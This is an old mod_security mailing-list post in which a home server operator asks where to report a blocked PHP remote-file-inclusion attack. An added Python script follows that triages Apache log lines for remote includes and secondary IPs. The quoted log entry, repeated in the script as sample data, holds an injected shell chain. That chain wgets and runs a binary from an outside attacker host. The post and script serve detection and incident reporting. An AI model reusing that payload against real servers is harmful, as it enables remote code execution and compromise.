[Modsecurity] hello, newbie user here
ET
etharp at earthlink.net
Sat Jun 10 09:34:57 EDT 2006
As this is my first post to this list, I want to first say hello, and
thanks for mod_security.
Now to my real question.
I run a 'hobby' Apache 2 (on Mandriva 2006) webserver off my home
computer and cable modem connection (running mod_security now, of
course), and I have always read the webserver's logs. Recently I saw a
known PHP exploit that mod_security stopped:
194.242.112.72 - - [09/Jun/2006:03:16:45 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 500 2659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
I normally do a whois lookup and notify the owners of the offending IPs,
and ask for them to secure the boxes.
In this particular log entry for this exploit, I noticed not only the
offending IP of 194.242.112.72, but also a couple of pages at
72.18.195.161, namely "http://72.18.195.161/cmd.gif" and
"72.18.195.161/lnikon".
I had seen that "command.gif" is really a text file, but had not seen
the "lnikon", and so I clicked and saved the "lnikon" file, which in
turn called 2 files, one named "linux-kernel" and one called
"linux-mkdir", both of which are binary files. If I open the files with
"khexedit" I can "extract strings" and see a few entries with
"newchrousty.org" in the name (Sympatico.Qc.Ca.newchrousty.org,
Chat.newchrousty.org, micro-ISP.newchrousty.org,
LaLiPus.newchrousty.org, Trois-Rivieres.QC.Ca.newchrousty.org,
IRC.newchrousty.org), and I also note the "72.18.195.161/" IP to be
written into the script for the 'linux-mkdir' file, as are the IPs
'24.224.174.18' and '81.223.104.152'.
Since these IPs do not show up in SpamCop's blacklists, I am wondering
if and to whom I should be reporting this info. Or should I not care;
am I worrying about something there is no cure for at this time?
--
reg. Linux User 167806
webhome http://ed-tharp.is-a-geek.org
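The triage the poster did by hand (pull the client IP out of the log entry, then notice that the URL-decoded query string points at a second host that serves the include file and the download) can be automated for an Apache combined-format access log. The script below is an added example written for this archive page, not code from the poster or from the mod_security project: it parses the entry quoted above, URL-decodes the request, flags any query parameter whose value is a remote URL (the classic PHP remote file inclusion shape), and lists every IPv4 address in the request other than the client, which is exactly the set of "secondary" hosts the poster is asking about reporting. The benign log line and the `triage` function name are constructed for the example; the combined log format regex is an assumption about how the server is configured.

```python
import re
from urllib.parse import unquote

# Sample 1: the entry quoted in the post above, re-joined onto one line.
ATTACK_LOG = (
    '194.242.112.72 - - [09/Jun/2006:03:16:45 -0400] "GET '
    '/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content'
    '&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?'
    '&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| '
    'HTTP/1.1" 500 2659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
)

# Sample 2: a constructed, benign request to the same script, for comparison.
BENIGN_LOG = (
    '10.0.0.5 - - [09/Jun/2006:03:20:00 -0400] "GET /index2.php?option=com_content&id=1 '
    'HTTP/1.1" 200 4821 "-" "Mozilla/5.0"'
)

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<request>.*?) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_combined(line):
    """Break one combined-format line into its named fields."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        raise ValueError("not a combined-format log line")
    return m.groupdict()


def split_query(request):
    """Return (path, [(name, value), ...]) for the request target.

    Only the first '?' separates path from query, and pairs are split on '&'
    alone (never ';'), so an injected shell chain inside one value stays in
    one piece regardless of the Python version's parse_qsl behaviour.
    """
    path, _, query = request.partition('?')
    pairs = []
    for chunk in query.split('&'):
        if not chunk:
            continue
        name, _, value = chunk.partition('=')
        pairs.append((unquote(name), unquote(value)))
    return path, pairs


def triage(line):
    """Summarise one access-log entry for incident reporting.

    remote_includes: parameters whose value is a remote URL (RFI shape).
    secondary_ips:   IPv4 addresses embedded in the request, other than the
                     requesting client; these are the hosts the payload would
                     contact and the ones worth reporting separately.
    """
    entry = parse_combined(line)
    path, params = split_query(entry['request'])
    remote_includes = [(n, v) for n, v in params if REMOTE_SCHEME_RE.match(v)]
    decoded = unquote(entry['request'])
    secondary_ips = sorted(set(IPV4_RE.findall(decoded)) - {entry['client']})
    return {
        'client': entry['client'],
        'path': path,
        'status': int(entry['status']),
        'remote_includes': remote_includes,
        'secondary_ips': secondary_ips,
        'suspicious': bool(remote_includes or secondary_ips),
    }


if __name__ == '__main__':
    for sample in (ATTACK_LOG, BENIGN_LOG):
        print(triage(sample))
```

Run against the quoted entry this reports the client 194.242.112.72, one remote include (`mosConfig_absolute_path` pointing at 72.18.195.161) and 72.18.195.161 as the only secondary IP; the benign line yields no findings. The client address goes to the abuse contact for its network as the poster already does, while the secondary addresses are the ones hosting the include file and the downloaded binary, which is why they deserve their own report.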